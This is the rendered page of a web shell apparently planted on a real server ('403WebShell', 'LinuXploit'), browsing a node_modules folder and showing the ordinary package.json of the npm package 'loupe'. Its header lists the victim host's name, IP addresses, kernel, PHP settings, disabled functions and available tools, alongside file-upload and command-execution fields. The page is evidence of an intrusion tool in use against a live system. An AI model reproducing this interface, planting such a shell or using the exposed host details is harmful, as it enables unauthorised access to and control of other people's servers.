Uname:Linux mail.sarafai.ru 6.1.0-43-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.162-1 (2026-02-08) x86_64

403WebShell
403Webshell
Server IP : 82.148.16.210  /  Your IP : 216.73.217.141
Web Server : nginx/1.29.5
System : Linux mail.sarafai.ru 6.1.0-43-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.162-1 (2026-02-08) x86_64
User : www-data ( 33)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /srv/projects/env4/src/dev/frontend3/node_modules/table/node_modules/loupe/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /srv/projects/env4/src/dev/frontend3/node_modules/table/node_modules/loupe/package.json
{
  "name": "loupe",
  "version": "2.3.7",
  "description": "Inspect utility for Node.js and browsers",
  "homepage": "https://github.com/chaijs/loupe",
  "license": "MIT",
  "author": "Veselin Todorov <hi@vesln.com>",
  "contributors": [
    "Keith Cirkel (https://github.com/keithamus)"
  ],
  "main": "./loupe.js",
  "module": "./index.js",
  "browser": {
    "./index.js": "./loupe.js",
    "util": false
  },
  "repository": {
    "type": "git",
    "url": "https://github.com/chaijs/loupe"
  },
  "files": [
    "loupe.js",
    "index.js",
    "lib/*"
  ],
  "scripts": {
    "bench": "node -r esm bench",
    "commit-msg": "commitlint -x angular",
    "lint": "eslint --ignore-path .gitignore .",
    "prepare": "rollup -c rollup.conf.js",
    "semantic-release": "semantic-release pre && npm publish && semantic-release post",
    "test": "npm run test:node && npm run test:browser",
    "pretest:browser": "npm run prepare",
    "test:browser": "karma start --singleRun=true",
    "posttest:browser": "npm run upload-coverage",
    "test:node": "nyc mocha -r esm",
    "posttest:node": "nyc report --report-dir \"coverage/node-$(node --version)\" --reporter=lcovonly && npm run upload-coverage",
    "upload-coverage": "codecov"
  },
  "eslintConfig": {
    "root": true,
    "parserOptions": {
      "ecmaVersion": 2020
    },
    "env": {
      "es6": true
    },
    "plugins": [
      "filenames",
      "prettier"
    ],
    "extends": [
      "strict/es6"
    ],
    "rules": {
      "comma-dangle": "off",
      "func-style": "off",
      "no-magic-numbers": "off",
      "class-methods-use-this": "off",
      "array-bracket-spacing": "off",
      "array-element-newline": "off",
      "space-before-function-paren": "off",
      "arrow-parens": "off",
      "template-curly-spacing": "off",
      "quotes": "off",
      "generator-star-spacing": "off",
      "prefer-destructuring": "off",
      "no-mixed-operators": "off",
      "id-blacklist": "off",
      "curly": "off",
      "semi": [
        "error",
        "never"
      ],
      "prettier/prettier": [
        "error",
        {
          "printWidth": 120,
          "tabWidth": 2,
          "useTabs": false,
          "semi": false,
          "singleQuote": true,
          "trailingComma": "es5",
          "arrowParens": "avoid",
          "bracketSpacing": true
        }
      ]
    }
  },
  "prettier": {
    "printWidth": 120,
    "tabWidth": 2,
    "useTabs": false,
    "semi": false,
    "singleQuote": true,
    "trailingComma": "es5",
    "arrowParens": "avoid",
    "bracketSpacing": true
  },
  "dependencies": {
    "get-func-name": "^2.0.1"
  },
  "devDependencies": {
    "@babel/core": "^7.12.10",
    "@babel/preset-env": "^7.12.11",
    "@commitlint/cli": "^11.0.0",
    "@rollup/plugin-commonjs": "^17.0.0",
    "@rollup/plugin-node-resolve": "^11.1.0",
    "benchmark": "^2.1.4",
    "chai": "^4.2.0",
    "codecov": "^3.8.1",
    "commitlint-config-angular": "^11.0.0",
    "core-js": "^3.8.3",
    "cross-env": "^7.0.3",
    "eslint": "^7.18.0",
    "eslint-config-strict": "^14.0.1",
    "eslint-plugin-filenames": "^1.3.2",
    "eslint-plugin-prettier": "^3.3.1",
    "esm": "^3.2.25",
    "husky": "^4.3.8",
    "karma": "^5.2.3",
    "karma-chrome-launcher": "^3.1.0",
    "karma-coverage": "^2.0.3",
    "karma-edge-launcher": "^0.4.2",
    "karma-firefox-launcher": "^2.1.0",
    "karma-ie-launcher": "^1.0.0",
    "karma-mocha": "^2.0.1",
    "karma-opera-launcher": "^1.0.0",
    "karma-safari-launcher": "^1.0.0",
    "karma-safaritechpreview-launcher": "^2.0.2",
    "karma-sauce-launcher": "^4.3.4",
    "mocha": "^8.2.1",
    "nyc": "^15.1.0",
    "prettier": "^2.2.1",
    "rollup": "^2.37.1",
    "rollup-plugin-babel": "^4.4.0",
    "rollup-plugin-istanbul": "^3.0.0",
    "semantic-release": "^17.3.6",
    "simple-assert": "^1.0.0"
  }
}

Youez - 2016 - github.com/yon3zu
LinuXploit